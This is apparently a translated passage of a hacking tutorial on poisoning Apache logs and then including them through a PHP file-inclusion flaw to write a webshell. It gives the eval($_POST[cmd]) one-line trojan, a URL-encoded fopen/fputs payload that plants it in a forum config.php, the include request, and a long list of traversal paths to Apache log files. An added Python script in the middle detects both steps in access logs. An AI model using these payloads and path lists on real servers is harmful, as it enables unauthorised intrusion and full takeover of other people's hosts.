Because the method above is very impractical (in my testing the log was easily tens of megabytes, and playing with it that way is no fun), let's think a bit further: we write in a genuinely usable webshell, which is also far better than the painfully slow approach above.

For example, still this one-line trojan:
<?eval($_POST[cmd]);?>
By this point you may already have thought of it: this is a pretty good method. Next, how to write it in becomes the problem. Use this statement:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?> //write the one-line trojan statement into config.php
We submit this statement, have Apache record it in the error log, and then include the log, which writes the shell successfully. Remember it must be converted to URL-encoded form, or it will not work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
This way the error log has recorded this line of webshell-writing code.
Now we include the log again, submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell has been written successfully: config.php now contains the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Connect to it directly with lanker's client and the host is yours.

PS: The prerequisite for all of the above is that the directory permissions are writable; it must be -rwxrwxrwx (777) before you can continue, which you check straight from the directory listing shown above. Everything above is exploitation in the case where the log path is already known.
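As an added example (not from the original post), the following Python script shows the defender's side of the two steps above: it URL-decodes the request field of Apache access-log lines and flags a request that carries PHP source (the poisoning step) and an include parameter aimed at a server log (the inclusion step). The sample log lines are constructed for this example, and the PHP_TAG / LOG_HINTS patterns are my assumptions, not anything from the post.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Decoded request contains PHP source: the poisoning payload itself (assumed pattern).
PHP_TAG = re.compile(r"<\?(php|=)?|\beval\s*\(|\$_(POST|GET|REQUEST)\b", re.I)
# Substrings that mark an include() argument as pointing at a web-server log (assumed).
LOG_HINTS = ("/logs/", "/log/", "error_log", "access_log", "error.log", "access.log")
# Request field of the Apache combined log format: "GET /path HTTP/1.1".
REQ = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def decode_fully(s: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (payloads are sometimes double-encoded)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def classify(line: str) -> list[str]:
    """Findings for one access-log line; an empty list means nothing suspicious."""
    m = REQ.search(line)
    if not m:
        return []
    target = decode_fully(m.group("target"))
    findings = []
    if PHP_TAG.search(target):
        findings.append("php-in-request")
    query = urlsplit(target).query
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if any(("../" in v or v.startswith("/")) and any(h in v for h in LOG_HINTS)
               for v in values):
            findings.append(f"log-include:{key}")
    return findings

def scan(log_text: str) -> dict[int, list[str]]:
    """Map 1-based line numbers to findings, omitting clean lines."""
    return {n: f for n, ln in enumerate(log_text.splitlines(), 1) if (f := classify(ln))}

# Constructed sample: line 1 is the post's encoded fopen/fputs payload, line 2 the
# include of the error log through the z.php?zizzy= parameter, line 3 is benign.
SAMPLE_LOG = """\
10.0.0.1 - - [01/Jan/2009:10:00:00 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E HTTP/1.1" 404 210
10.0.0.1 - - [01/Jan/2009:10:00:05 +0800] "GET /z.php?zizzy=../../../../../../../../../../var/log/httpd/error_log HTTP/1.1" 200 4096
10.0.0.2 - - [01/Jan/2009:10:01:00 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 8123
"""

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(f)}")
```

Because the poisoning request is logged whether or not it returns 404, the access log is the place to alert on it, and the alert should fire before the include request arrives.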
For other log paths you can guess, or refer to the ones here.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log